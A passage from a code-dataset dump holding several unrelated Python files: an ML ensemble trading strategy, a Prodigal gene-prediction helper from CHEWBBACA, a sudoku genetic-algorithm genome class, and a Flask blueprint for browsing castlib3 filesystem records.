of Predicted Signals Based on Selected Features\n '''\n Signals:\n 1 - Take Long Position\n 0 - Hold Position\n -1 - Take Short Position\n '''\n signals_DT_in_df = self.predict('DecisionTree', prices_in_df, period = self.window_period, threshold = 0.03)\n signals_RF_in_df = self.predict('RandomForest', prices_in_df, period = self.window_period, threshold = 0.03)\n signals_LR_in_df = self.predict('LogisticRegression', prices_in_df, period = self.window_period, threshold = 0.03)\n\n '''\n Debug 10: Checking Generated Signals\n '''\n #self.Debug(\"Generated Signals from DT: \")\n #self.Debug(signals_DT_in_df) \n #self.Debug(\"Generated Signals from RF: \")\n #self.Debug(signals_RF_in_df) \n #self.Debug(\"Generated Signals from LR: \")\n #self.Debug(signals_LR_in_df) \n \n # Concatenate all Information into a Master Table\n prices_in_df = 
prices_in_df[-len(signals_DT_in_df):]\n master_table = pd.concat([prices_in_df, signals_DT_in_df, signals_RF_in_df, signals_LR_in_df], axis = 1).dropna()\n\n '''\n Debug 11: Checking Master Table is in Order\n '''\n #self.Debug(\"Master Table Check: \")\n #self.Debug(master_table.head())\n #self.Debug(\"Current OnData Check: \")\n self.Debug(master_table.tail(1).iloc[:,4:]) # Check Information on Current OnData\n \n if master_table.tail(1).iloc[0][4 + self.sym_n] == 1.0 and \\\n master_table.tail(1).iloc[0][5 + self.sym_n] == 1.0 and \\\n master_table.tail(1).iloc[0][6 + self.sym_n] == 1.0 and \\\n self.trading_symbol not in self.long_list and \\\n self.trading_symbol not in self.short_list :\n \n self.SetHoldings(self.trading_symbol, 1)\n self.long_list.append(self.trading_symbol)\n self.Debug(\"long\")\n \n if self.trading_symbol in self.long_list:\n \n cost_basis = self.Portfolio[self.trading_symbol].AveragePrice\n \n if ((price <= float(0.995) * float(cost_basis)) or (price >= float(1.01) * float(cost_basis))):\n self.SetHoldings(self.trading_symbol, 0)\n self.long_list.remove(self.trading_symbol)\n self.Debug(\"liquidate long\")\n \n if master_table.tail(1).iloc[0][4 + self.sym_n] == -1.0 and \\\n master_table.tail(1).iloc[0][5 + self.sym_n] == -1.0 and \\\n master_table.tail(1).iloc[0][6 + self.sym_n] == -1.0 and \\\n self.trading_symbol not in self.long_list and \\\n self.trading_symbol not in self.short_list :\n \n self.SetHoldings(self.trading_symbol, -1)\n self.short_list.append(self.trading_symbol)\n self.Debug(\"short\")\n \n if self.trading_symbol in self.short_list:\n \n cost_basis = self.Portfolio[self.trading_symbol].AveragePrice\n \n if ((price <= float(0.99) * float(cost_basis)) or (price >= float(1.005) * float(cost_basis))):\n self.SetHoldings(self.trading_symbol, 0)\n self.short_list.remove(self.trading_symbol)\n self.Debug(\"liquidate short\")\n\n # Reverse the Currency Pair Ratio\n def reverseCurr(self, prices_in_df, extra_sym):\n \n for i in extra_sym:\n prices_in_df[i] = 1/prices_in_df[i]\n \n return prices_in_df\n\n # Run the Prediction Model\n def predict(self, model, prices_in_df, period, threshold):\n\n # Number of Rolling Windows\n no_of_windows = int(len(prices_in_df) / period)\n # Total Number of Records Processable (To Prevent Index Out of Bounds)\n length = no_of_windows * period\n \n '''\n Debug 3: Checking all Obtained Parameters are Correct\n '''\n #self.Debug(\"Model: \" + model)\n #self.Debug(\"Period: \" + str(period))\n #self.Debug(\"Threshold: \" + str(threshold))\n #self.Debug(\"Length of Dataframe: \" + str(len(prices_in_df)))\n #self.Debug(\"No of Windows: \" + str(no_of_windows))\n #self.Debug(\"Length: \" + str(length))\n \n # Subsetting Latest N Records that is Within Range\n prices_in_df = prices_in_df[-(length):]\n \n signals = [] # List of Signals\n dates = [] # List of Dates\n \n # For Each Window\n for i in range(0, no_of_windows - 2):\n \n # Retrieve Projection Scores & Weights from Principle Component Analysis\n proj_scores = self.PCA(prices_in_df[(i * period):((i + 3) * period)]) \n \n '''\n Debug 5: Checking Projection Scores\n '''\n #self.Debug(\"Projection Scores: \")\n #self.Debug(proj_scores.head(5))\n \n # Retrieve Technical Indicators (Extended Features)\n predictor_in_df = self.indicator(period, proj_scores)\n \n '''\n Debug 6: Checking Technical Indicators\n '''\n #self.Debug(\"Technical Indicators: \")\n #self.Debug(predictor_in_df.head(5))\n \n ''' Get Train & Test Data [User-Defined Sizes] '''\n train_x = 
predictor_in_df[:int(len(predictor_in_df) / 2)]\n train_y = self.generateSignal(proj_scores[int(len(proj_scores) / 3 - 1):int(len(proj_scores) / 3 * 2)],\\\n threshold)\n test_x = predictor_in_df[int(len(predictor_in_df) / 2):]\n \n '''\n Debug 8: Checking Test and Train Data\n '''\n #self.Debug(\"Train X: \")\n #self.Debug(train_x.head(5)) \n #self.Debug(\"Generated Train Data Signals: \")\n #self.Debug(train_y.head(5)) \n #self.Debug(\"Test X: \")\n #self.Debug(test_x.head(5)) \n \n # Get List of Predictions\n prediction_in_list = self.classifier(model, train_x, train_y.values.ravel(), test_x)\n \n '''\n Debug 9: Checking Predictions from Ensemble\n '''\n #self.Debug(\"Predictions from Ensemble: \")\n #self.Debug(prediction_in_list) \n \n dates.extend(test_x.index) # Populate List of Dates\n signals.extend(prediction_in_list) # Populate List of Signals\n \n # Converting List of Signals & Dates into DataFrame\n return pd.DataFrame({'signal': signals}, index = dates)\n \n # Principle Component Analysis \n def PCA(self, prices_in_df):\n #self.Debug(\"INSIDE PCA\")\n \n # Normalize all Values in DataFrame\n normalized_price = (prices_in_df - prices_in_df.mean())/prices_in_df.std()\n\n # Obtain Sample Covariance by \n # 1. Taking 'normalized_price' DataFrame as a Matrix\n # 2. Transposing it\n # 3. Executing Dot Product on Original Against Transposed 'normalized_price'\n # 4. Dividing by Length of Matrix\n covariance = normalized_price.T.dot(normalized_price) / (len(normalized_price) - 1) \n \n '''\n Debug 4: Checking if Prices are Normalized and Sample Covariance Values Are Obtained Properly\n '''\n #self.Debug(\"Normalized Price: \")\n #self.Debug(normalized_price.head(5))\n #self.Debug(\"Covariance: \")\n #self.Debug(covariance.head(5))\n \n # Retrieve Eigen Decomposition of Sample Covariance Matrix\n eigenvalues, eigenvectors = np.linalg.eig(covariance.dropna())\n \n # Retrieve Projection Scores by\n # 1. Taking 'normalized_price' DataFrame and 'eigenvectors[0]' as Matrices\n # 2. Transposing 'eigenvectors[0]'\n # 2. 
Executing Dot Product on 'normalized_price' Against the Transposed 'eigenvectors[0]' \n proj_scores = normalized_price.dot(eigenvectors[0].T)\n \n return proj_scores\n \n # Generating Technical Indicators\n def indicator(self, period, proj_scores):\n\n # Relative position\n Relative_Position = []\n for i in range(period, len(proj_scores)):\n Relative_Position.append((proj_scores[i] - min(proj_scores[(i - period):i])) \\\n /(max(proj_scores[(i - period):i]) - min(proj_scores[(i - period):i])))\n \n # Relative Strength Index \n RSI = talib.RSI(np.array(proj_scores), period)\n RSI = RSI[~np.isnan(RSI)]\n \n # Momentum\n MOM = (proj_scores / proj_scores.shift(period)).dropna() * 100\n \n # Moving Average Convergence-Divergence\n MACD_slow = period\n MACD_fast = int(floor(period * 0.5))\n MACD, MACD_signal, MACD_hist = talib.MACDEXT(np.array(proj_scores), fastperiod = MACD_fast, \\\n fastmatype = MA_Type.EMA, slowperiod = MACD_slow, \\\n slowmatype = MA_Type.EMA, signalperiod = 2, \\\n signalmatype = 0)\n MACD = MACD[~np.isnan(MACD)]\n \n # All Technical Indicators as Independent Variables for Prediction Models in DataFrame\n predictor_in_df = pd.DataFrame({'RP': Relative_Position, 'RSI': RSI, 'MOM': MOM, 'MACD': MACD}, \\\n index = proj_scores.index[period:])\n \n return predictor_in_df\n \n # Generating Response Variables\n def generateSignal(self, proj_scores, threshold):\n\n signals = [] # List of Signals\n percentage_change = proj_scores.pct_change().dropna() # Percentage Change Among Projection Scores\n \n '''\n Debug 7: Checking % Change of Projection Scores\n '''\n #self.Debug(\"% Change of Projection Scores: \")\n #self.Debug(percentage_change.head(5))\n \n # Generate Signals Based on Percentage Change of Projection Scores\n '''\n Signals:\n 1 - Take Long Position\n 0 - Hold Position\n -1 - Take Short Position\n '''\n for i in percentage_change:\n \n if i > threshold:\n signals.append(1)\n \n elif i < -threshold:\n signals.append(-1)\n \n else:\n signals.append(0)\n \n # Returns a DataFrame Consisting of Signals and Percentage Change Indexes\n return pd.DataFrame({'signal': signals}, index = percentage_change.index)\n \n # Generating Predicted Values from Classifiers\n def classifier(self, model, train_x, train_y, test_x):\n\n if model == 'LogisticRegression':\n model_execution = LogisticRegression()\n \n if model == 'DecisionTree':\n model_execution = tree.DecisionTreeClassifier()\n \n if model == 'RandomForest':\n model_execution = RandomForestClassifier(n_estimators = 100, max_depth = 2)\n \n model_execution = model_execution.fit(train_x, train_y)\n prediction_in_list = model_execution.predict(test_x)\n \n # Returns a List of Predictions\n return list(prediction_in_list)","repo_name":"nusfintech/Machine-Learning-Projects","sub_path":"Algorithmic Trading/Voting Ensemble Strategy/Ensemble_Maple.py","file_name":"Ensemble_Maple.py","file_ext":"py","file_size_in_byte":15754,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"5900177879","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nPurpose\n-------\n\nThis module contains functions related to gene prediction\nwith Prodigal and extraction of coding sequences from\nFASTA records.\n\nCode documentation\n------------------\n\"\"\"\n\n\nimport os\nimport pickle\nimport subprocess\n\ntry:\n from utils import (file_operations as fo,\n fasta_operations as fao,\n iterables_manipulation as im)\nexcept:\n from CHEWBBACA.utils import (file_operations as fo,\n 
fasta_operations as fao,\n iterables_manipulation as im)\n\n\ndef check_prodigal_results(prodigal_results, output_directory):\n \"\"\" Determines if Prodigal could not predict genes for any input\n assembly.\n\n Parameters\n ----------\n prodigal_results : list\n List with gene prediction results from Prodigal.\n output_directory : str\n Path to the output directory where the file with information\n about failed cases will be written to.\n\n Returns\n -------\n A list with the following elements:\n failed : list\n List with the stderr for the cases that Prodigal\n failed to predict genes for.\n failed_file : str\n Path to the file with information about the failed\n cases.\n \"\"\"\n\n no_cds = [l for l in prodigal_results if l[1] == 0]\n errors = [l for l in prodigal_results if isinstance(l[1], str) is True]\n failed = no_cds + errors\n\n failed_file = os.path.join(output_directory, 'prodigal_stderr.tsv')\n if len(failed) > 0:\n lines = ['{0}\\t{1}'.format(l[0], l[1]) for l in failed]\n fo.write_lines(lines, failed_file)\n\n return [failed, failed_file]\n\n\ndef extract_genome_cds(reading_frames, contigs, starting_id):\n \"\"\" Extracts CDSs from contigs based on the start\n and stop codon positions determined by Prodigal.\n\n Parameters\n ----------\n reading_frames : str\n Path to the ORF file created by Prodigal.\n contigs : dict\n Dictionary with contig ids as keys and contig\n sequences as values.\n starting_id : int\n Integer identifier attributed to the first CDS\n and that will be incremented to serve as identifier\n for subsequent CDSs.\n\n Returns\n -------\n coding_sequences : dict\n Dictionary with coding sequences ids as keys and\n coding sequences as values.\n coding_sequences_info : list\n List with a sublist for each extracted CDS. 
Sublists\n have information about the extracted CDS (identifier\n of the contig the CDS was identified in, start position\n in the contig, stop position in the contig, sequence\n identifier attributed to that CDS and the strand that\n coded for that CDS).\n \"\"\"\n\n seqid = starting_id\n coding_sequences = {}\n coding_sequences_info = []\n for contig_id, frames in reading_frames.items():\n sequence = contigs[contig_id]\n # for each start and stop codon in the contig\n for cds in frames:\n start_pos = cds[0]\n stop_pos = cds[1]\n strand = cds[2]\n # extract CDS sequence\n cds_sequence = im.extract_single_cds(sequence, *cds).upper()\n\n # store CDS with unique id\n coding_sequences[seqid] = cds_sequence\n\n # store CDS information\n coding_sequences_info.append([contig_id, str(start_pos),\n str(stop_pos), str(seqid),\n str(strand)])\n\n # increment seqid\n seqid += 1\n\n return [coding_sequences, coding_sequences_info]\n\n\ndef write_protein_table(output_file, genome_id, cds_info):\n \"\"\" Writes information about coding sequences in a\n genome to a file.\n\n Parameters\n ----------\n output_file : str\n Path to the output file to which info will\n be saved.\n genome_id : str\n Identifier of the genome to add to first field\n of every new line.\n cds_info : list\n List with information about each coding sequence\n identified in the genome (contig identifier,\n CDS start position, CDS stop position, CDS\n identifier and CDS coding strand).\n \"\"\"\n\n table_lines = [[genome_id] + protein_info\n for protein_info in cds_info]\n table_lines = [im.join_list(line, '\\t') for line in table_lines]\n table_text = im.join_list(table_lines, '\\n')\n fo.write_to_file(table_text, output_file, 'a', '\\n')\n\n\ndef save_extracted_cds(genome, identifier, orf_file, protein_table, cds_file):\n \"\"\" Extracts coding sequences from a genome assembly based\n on Prodigal's gene predictions. 
Writes coding sequences\n to a FASTA file and information about coding sequences to\n a TSV file.\n\n Parameters\n ----------\n genome : str\n Path to the FASTA file with the FASTA sequences for\n a genome.\n identifier : str\n Genome identifier to add to FASTA records headers\n and to the first field in the TSV file.\n orf_file : str\n Path to the file with Prodigal results.\n protein_table : str\n Path to the TSV file to which coding sequences\n information will be written.\n cds_file : str\n Path to the FASTA file to which coding sequences\n will be written.\n\n Returns\n -------\n total_cds : int\n Total number of coding sequences extracted from\n the genome.\n \"\"\"\n\n # import contigs for current genome/assembly\n contigs = fao.import_sequences(genome)\n # extract coding sequences from contigs\n reading_frames = fo.pickle_loader(orf_file)\n genome_info = extract_genome_cds(reading_frames, contigs, 1)\n # save coding sequences to file\n # create records and write them to file\n cds_lines = fao.create_fasta_lines(genome_info[0], identifier)\n fo.write_lines(cds_lines, cds_file)\n\n write_protein_table(protein_table, identifier, genome_info[1])\n\n total_cds = len(genome_info[0])\n\n return total_cds\n\n\ndef cds_batch_extractor(genomes, prodigal_path, temp_directory, index):\n \"\"\" Extracts coding sequences from a set of genomes.\n\n Parameters\n ----------\n input_data : list\n List with a set of paths for FASTA files with\n genomic sequences, followed by the path to the\n directory with files with Prodigal resutls, the\n path to the temporary directory for all files and\n directories that will be read and written and\n an index/identifier to add to the output files\n with coding sequences and coding sequences info.\n\n Returns\n -------\n A list with the following elements:\n protein_table : str\n Path to the TSV file to which coding sequences\n info was written.\n cds_file : str\n Path to the FASTA file to which coding sequences\n were written.\n batch_total : int\n Total number of coding sequences extracted from\n the set of input genomes.\n \"\"\"\n\n protein_table = fo.join_paths(temp_directory,\n ['protein_info_{0}.tsv'.format(index)])\n\n cds_file = fo.join_paths(temp_directory,\n ['coding_sequences_{0}.fasta'.format(index)])\n\n batch_total = 0\n for g in genomes:\n # determine Prodigal ORF file path for current genome\n identifier = fo.file_basename(g, False)\n orf_file_path = fo.join_paths(prodigal_path,\n ['{0}_ORF.txt'.format(identifier)])\n total = save_extracted_cds(g, identifier, orf_file_path,\n protein_table, cds_file)\n batch_total += total\n\n return [protein_table, cds_file, batch_total]\n\n\ndef run_prodigal(input_file, translation_table, mode, ptf_path):\n \"\"\" Executes Prodigal.\n\n Parameters\n ----------\n input_file : str\n Path to input FASTA file.\n translation_table : int\n Genetic code.\n mode : str\n Prodigal execution mode ('single' is the default,\n 'meta' should be used to predict genes from smaller\n contigs).\n ptf_path : str or None\n Path to the training file.\n\n Returns\n -------\n stdout : bytes\n Prodigal's stdout.\n stderr : bytes\n Prodigal's stderr.\n \"\"\"\n\n if ptf_path is not None:\n proc = subprocess.Popen(['prodigal', '-i', input_file, '-c',\n '-m', '-g', str(translation_table), '-p',\n mode, '-f', 'sco', '-q', '-t', ptf_path],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n elif ptf_path is None:\n proc = subprocess.Popen(['prodigal', '-i', input_file, '-c',\n '-m', '-g', str(translation_table), '-p',\n mode, '-f', 
'sco', '-q'],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n\n # Read the stdout from Prodigal\n stdout = proc.stdout.readlines()\n stderr = proc.stderr.readlines()\n\n return [stdout, stderr]\n\n\ndef main(input_file, output_dir, ptf_path, translation_table, mode):\n\n stdout, stderr = run_prodigal(input_file, translation_table, mode, ptf_path)\n\n genome_basename = fo.file_basename(input_file, False)\n\n if len(stderr) > 0:\n stderr = [line.decode('utf-8').strip() for line in stderr]\n stderr = [line for line in stderr if line != '']\n error = ' '.join(stderr)\n return [input_file, error]\n\n # Parse output\n lines = [line.decode('utf-8').strip() for line in stdout]\n\n # determine contigs headers indexes\n contigs_headers = [l for l in lines if 'seqhdr' in l]\n contigs_ids = [l.split('\"')[1].split()[0] for l in contigs_headers]\n contigs_idx = [lines.index(l) for l in contigs_headers] + [len(lines)]\n\n # get CDSs' positions for each contig\n contigs_pos = {contigs_ids[i]: lines[contigs_idx[i]+1:contigs_idx[i+1]]\n for i in range(len(contigs_ids))}\n\n # exclude contigs without coding sequences\n contigs_pos = {k: v[1:] for k, v in contigs_pos.items() if len(v) > 1}\n\n strand_trans = {'+': 1, '-': 0}\n\n # split and convert list elements\n contigs_pos = {k: [p.split('_')[1:] for p in v]\n for k, v in contigs_pos.items()}\n contigs_pos = {k: [[int(p[0])-1, int(p[1]), strand_trans[p[2]]]\n for p in v] for k, v in contigs_pos.items()}\n\n total_contigs = {k: len(v) for k, v in contigs_pos.items()}\n total_genome = sum(total_contigs.values())\n\n if total_genome > 0:\n # save positions in file\n filepath = os.path.join(output_dir, genome_basename + '_ORF.txt')\n with open(filepath, 'wb') as f:\n pickle.dump(contigs_pos, f)\n\n status = [input_file, total_genome]\n\n return status\n\n\nif __name__ == \"__main__\":\n\n main()\n","repo_name":"AMARTELKE/Whole-and-core-genomes-phylogeney","sub_path":"CHEWBBACA/utils/gene_prediction.py","file_name":"gene_prediction.py","file_ext":"py","file_size_in_byte":11466,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33079028654","text":"import random\nimport copy\n\nCOPY_CHANCE = 1\nFRESH_CHANCE = 1\nCROSSOVER_CHANCE = 5\nSWAP_CHANCE = 3\n\nclass Genome:\n \"\"\"In this solution a genome is encoded as a list of elements and since in the sudoku problem the values appear the same number of times, as operations we will consider only operations that execute permutations within the elements of the gene.\n \"\"\"\n \n def __init__(self, initial, spawn_chances=None):\n \"\"\"The array spawn_chances is in the form of [(spawn_method, spawn_probability),(spawn_method2, spawn_probability2),...]\"\"\"\n\n \"\"\"Spawn chances are decidable in the variables, the operations implemented and possible as spawn are: copy [copies the current genes], fresh [creates fresh genes], crossover [executes a crossover between the two parents] and swap [randomly swaps two values inside of the genes: it's considered as a random mutation of the genetic code]\"\"\"\n\n self.spawn_chances = ((Genome.copy, COPY_CHANCE),\n (Genome.fresh, FRESH_CHANCE),\n (Genome.crossover, CROSSOVER_CHANCE),\n (Genome.swap, SWAP_CHANCE))\n\n self.genes = copy.copy(initial)\n self.total_target = sum(chance for _, chance in self.spawn_chances) # The total of chances\n self.partner = None\n\n def spawn(self, partner):\n \"\"\"Uses a partner to spawn a new child (it could potentially not use the partner's genetic code, in the case of the 
copy, fresh or mutation\"\"\"\n self.partner = partner\n rnd = random.randrange(self.total_target)\n i = 0\n for spawn_function, spawn_chance in self.spawn_chances:\n if rnd < i + spawn_chance:\n child = spawn_function(self)\n break\n i += spawn_chance\n\n del self.partner # memory purpose\n return child\n\n def copy(self, genes=None):\n # Maybe could be useful to initialize genes\n return Genome(self.genes, self.spawn_chances)\n \n def fresh(self):\n child = self.copy()\n random.shuffle(child.genes) # shuffles the list of values\n return child\n\n def swap(self):\n child = self.copy()\n i = random.randrange(len(child.genes))\n j = random.randrange(len(child.genes)) # There is not a control to check whether the two values are different, so there is a probability of 1/6561 of having a copy, let's just let nature and randomness do their thing\n child.genes[i], child.genes[j] = child.genes[j], child.genes[i]\n return child\n\n def crossover(self):\n genes1 = self.genes[:]\n genes2 = self.partner.genes[:]\n\n # Create a conflict vector that stores the position of the conflicts between the corresponding cells and fills the result array with nothing, in order to go back after the first cycle where equality is check.\n result = []\n i = 0\n conflicts = []\n while i < len(genes1):\n if genes1[i] == genes2[i]:\n result.append(genes1[i])\n genes1.pop(i)\n genes2.pop(i)\n else:\n conflicts.append(len(result))\n result.append(None)\n i += 1\n\n for i in conflicts:\n # 50% chance of using the first gene to choose the current value \n if random.random() < 0.5:\n result[i] = genes1[0]\n genes2.remove(genes1.pop(0))\n # Remove the selected element from the gene1 and then removes the same element (a number in this sudoku case) from the second gene in order to keep the same quantity of equals figures inside of the gene representing the sudoku [it's necessary to permutate the values in every reproductive operation inside of this class]\n else:\n result[i] = genes2[0]\n genes1.remove(genes2.pop(0))\n\n return Genome(result, self.spawn_chances) \n \n\n \"\"\"\n result = []\n i = 0\n conflicts = []\n\n print(\"GENE1 SIZE: \" + str(len(genes1)))\n print(\"GENE2 SIZE: \" + str(len(genes2)))\n\n while i < len(genes1):\n print(\"INDEX: \" + str(i))\n if genes1[i] == genes2[i]:\n result.append(genes1[i])\n genes1.pop(i)\n genes2.pop(i)\n else: \n if random.random() < 0.5:\n to_append = genes1[i]\n else: \n to_append = genes2[i]\n result.append(to_append)\n genes1.remove(to_append)\n genes2.remove(to_append)\n\n \n return Genome(result, self.spawn_chances) \n \n print(conflicts)\n print(\" CONFLICTS LENGTH: \" + str(len(conflicts)))\n\n for conflict_position in conflicts:\n if random.random() < 0.5: \n # 50% chance of using the first gene to choose the current value \n result[conflict_position] = genes1[0]\n to_remove = genes1.pop(0)\n print(\"To remove: \" + str(to_remove)) # Remove the selected element from the gene1 and then removes the same element (a number in this sudoku case) from the second gene in order to keep the same quantity of equals figures inside of the gene representing the sudoku [it's necessary to permutate the values in every reproductive operation inside of this class]\n\n else:\n result[conflict_position] = genes2[0]\n to_remove = genes2.pop(0)\n print(\"To remove: \" + str(to_remove))\n genes1.remove(to_remove)\n # By popping we keep the memory clean and the index of the next element is always gonna be 0\n \"\"\" \n","repo_name":"tommaso-sacchetti/Sudoku-AI-Solver","sub_path":"genetic 
algorithm/genome.py","file_name":"genome.py","file_ext":"py","file_size_in_byte":5736,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71127509992","text":"from __future__ import print_function\n\nimport os, re, json, yaml\nfrom flask import Blueprint, render_template, request, url_for\nfrom flask.views import MethodView as FlaskMethodView\nfrom flask_api import status as HTTP_STATUS_CODES\nfrom collections import OrderedDict\n\nfrom castlib3.logs import gLogger\nfrom castlib3.models.filesystem import Folder, File, FSEntry\nfrom castlib3.exec_utils import initialize_database, ordered_load, discover_locations\n\nimport sVresources.db.instance\nfrom sVresources import apps\nfrom sVresources.utils.contentType import expected_content_type\nfrom sVresources.utils.queueTools import DelayedTaskViewMetaclass, CachedTaskView\nfrom hashlib import md5\n\nbp = Blueprint('cstl3', __name__,\n template_folder='templates',\n static_folder='static',\n url_prefix='/rawstat')\n\ngAvailableTasks = {}\n\ndef ordered_load(stream, Loader=yaml.Loader, object_pairs_hook=OrderedDict):\n class OrderedLoader(Loader):\n pass\n def construct_mapping(loader, node):\n loader.flatten_mapping(node)\n return object_pairs_hook(loader.construct_pairs(node))\n OrderedLoader.add_constructor(\n yaml.resolver.BaseResolver.DEFAULT_MAPPING_TAG,\n construct_mapping)\n return yaml.load(stream, OrderedLoader)\n\ndef append_tasks_dict( dct, key, content ):\n existingSingle = dct.get(key, None)\n existingMultiple = dct.get(key + '-1', None)\n if not (existingSingle or existingMultiple):\n dct[key] = content\n return\n # Task with similar name exists. Re-insert it incrementing index by one.\n if existingSingle:\n dct.pop(key)\n dct[key + '-1'] = existingSingle\n dct[key + '-2'] = content\n return\n # Multiple tasks with similar name:\n latestIdx = int(key.split('-')[-1:]) + 1\n dct[key + '_%d'%latestIdx] = content\n\ndef discover_stages( path ):\n ret = {}\n if not path:\n return ret\n subdirs = []\n for e in os.listdir(path):\n ePath = os.path.join( path, e )\n if os.path.isfile( ePath ) and re.match( \"^.+\\.yml$\", e ):\n taskName = e[:-4]\n taskContent = None\n with open(ePath) as f:\n taskContent = ordered_load(f)\n if taskContent.get('stages', None):\n taskContent['_location'] = ePath\n append_tasks_dict( ret, taskName, taskContent )\n elif os.path.isdir( ePath ):\n subdirs.append( ePath )\n for e in subdirs:\n sRet = discover_stages( e )\n ret.update(sRet)\n return ret\n\ndef configure( *args, **kwargs ):\n tasksCatalogues=kwargs.get( 'cstlStagesDirs', None )\n if tasksCatalogues is not None:\n for e in tasksCatalogues:\n if os.path.exists(e) and os.path.isdir(e):\n gAvailableTasks.update( discover_stages( e ) )\n gLogger.info( \"%d CastLib tasks have been discovered in \\\"%s\\\"\"%(\n len(gAvailableTasks), e) )\n else:\n gLogger.warning( 'Path \"%s\" is not reachable or does not refer '\n 'to a directory. 
Can not extract CastLib tasks from '\n 'there.'%e )\n else:\n gLogger.warning( \"No \\\"cstlStagesDirs\\\" parameter is given.\" )\n\ndef follow_path( path ):\n folderEntry = apps.query(Folder).filter( Folder.name=='$root' ).first()\n if not folderEntry:\n return None # no root --- table is empty\n pToks = []\n path_ = path\n while True:\n path_, head = os.path.split(path_)\n pToks.append(head)\n if not head:\n break\n pToks.reverse()\n for pEntry in pToks[1:]:\n folderEntry = apps.db.query(Folder).filter(\n FSEntry.parent==folderEntry,\n FSEntry.name==pEntry).first()\n return folderEntry\n\n#\n# Filesystem\n\n@bp.route('/observe/castlib3-files', methods=['GET'])\ndef observe_filesystem():\n \"\"\"\n Web view returning browseable HTML page.\n \"\"\"\n return render_template( 'pages/observe-files.html'\n , AJAXTreeAddr='castlib3-files-ajax'\n , AJAXGroupDetails=url_for('cstl3.folder_details')\n , AJAXItemDetails=url_for('cstl3.file_details')\n , AJAXParameters=['path']\n , groupFields=['path'] )\n\n@bp.route('/observe/castlib3-files-ajax', methods=['POST'])\n@expected_content_type\ndef filesystem_entries():\n \"\"\"\n Returns castlib3 filesystem tree queries in form suitable for zTree.\n \"\"\"\n path = request.form.get( 'path', '/' )\n folderEntry = follow_path( path )\n if not folderEntry:\n return [], HTTP_STATUS_CODES.HTTP_200_OK # database is empty\n ret = []\n for entry in folderEntry.children.values():\n vPath = os.path.join( path if path else '/', entry.name )\n ret.append({\n 'name' : entry.name,\n 'isParent' : 'd' == entry.type,\n 'path' : vPath\n })\n return ret, HTTP_STATUS_CODES.HTTP_200_OK\n\n@bp.route('/observe/castlib3-file-details-ajax', methods=['GET'])\n@expected_content_type\ndef file_details():\n path = request.args.get( 'path' )\n if not path:\n return {'details' : 'request did not submitted path'}, \\\n HTTP_STATUS_CODES.HTTP_400_BAD_REQUEST\n folderPath, filename = os.path.split(path)\n folderEntry = follow_path( folderPath )\n if not folderEntry:\n return {}, HTTP_STATUS_CODES.HTTP_404_NOT_FOUND\n fileEntry = DB.session.query(File) \\\n .filter( File.parent==folderEntry,\n File.name==filename ).first()\n return fileEntry.as_dict(), HTTP_STATUS_CODES.HTTP_200_OK\n\n@bp.route('/observe/castlib3-folder-details-ajax', methods=['GET'])\n@expected_content_type\ndef folder_details():\n path = request.args.get( 'path' )\n if not path:\n return {'details' : 'request did not submitted path'}, \\\n HTTP_STATUS_CODES.HTTP_400_BAD_REQUEST\n folderEntry = follow_path(path)\n if not folderEntry:\n return {}, HTTP_STATUS_CODES.HTTP_404_NOT_FOUND\n return folderEntry.as_dict(), HTTP_STATUS_CODES.HTTP_200_OK\n\n\n#\n# Long-running operations\n\n@bp.route('/manage', methods=['GET'])\ndef manage_cstl3():\n extendedTasks = {}\n for k, v in gAvailableTasks.iteritems():\n extendedTasks[k] = {\n 'comment' : v.get('comment', '(No comment available.)')\n , 'runnable' : v.get('runnable', False)\n , 'stagesJS' : json.dumps( v['stages'] )\n , 'fileLocation' : v['_location']\n }\n return render_template('pages/manage.html'\n , availableTasks=extendedTasks)\n\nclass BaseCSTL3View(FlaskMethodView):\n \"\"\"\n View class implementing generic castlib3 routines related to sV-resources\n server.\n \"\"\"\n pass\n\nclass Castlib3TaskView( BaseCSTL3View, CachedTaskView ):\n \"\"\"\n This view is responsible for delayed cstl3 launch.\n \"\"\"\n __metaclass__ = DelayedTaskViewMetaclass\n __delayedTaskParameters = {\n 'queue' : 'cstl3',\n 'import' : 'castlib3.sVbp.tasks.castlib3_stages'\n }\n\n 
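# args_digest() keys the cached task: requests for the same stage name map to the\n    # same md5 digest, so repeated GETs can re-use one queued cstl3 run rather than\n    # enqueueing duplicates.\n    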
@staticmethod\n    def args_digest( stageName\n                   , stages=[]\n                   , externalImport=[]\n                   , directories=None # TODO: use after cpickle\n                   ):\n        return md5(stageName).hexdigest()\n\n    def get(self, stageName):\n        stagesDescription = gAvailableTasks.get( stageName, None )\n        if not stagesDescription:\n            abort( HTTP_STATUS_CODES.HTTP_404_NOT_FOUND )\n        return super( Castlib3TaskView, self).delayed_retrieve( self\n                , stageName\n                , stages=stagesDescription['stages']\n                , externalImport=stagesDescription.get('external-import', [])\n                , directories=None # TODO\n            )\n\n    def post(self, stageName):\n        stagesDescription = gAvailableTasks.get( stageName, None )\n        if not stagesDescription:\n            abort( HTTP_STATUS_CODES.HTTP_404_NOT_FOUND )\n        pass\n\nbp.add_url_rule( '/run/<stageName>',\n        view_func=Castlib3TaskView.as_view('run_stage') )\n\nsVresources_Blueprint = bp\nsVresources_ObservablePages = [\n    # title, destination\n    ('CASTOR entries', 'cstl3.observe_filesystem')\n    , ('Manage CastLib tasks', 'cstl3.manage_cstl3')\n    # ('API reference', 'extGDML.reference') # TODO\n    ]\n\n","repo_name":"CrankOne/castlib","sub_path":"sVbp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":8458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
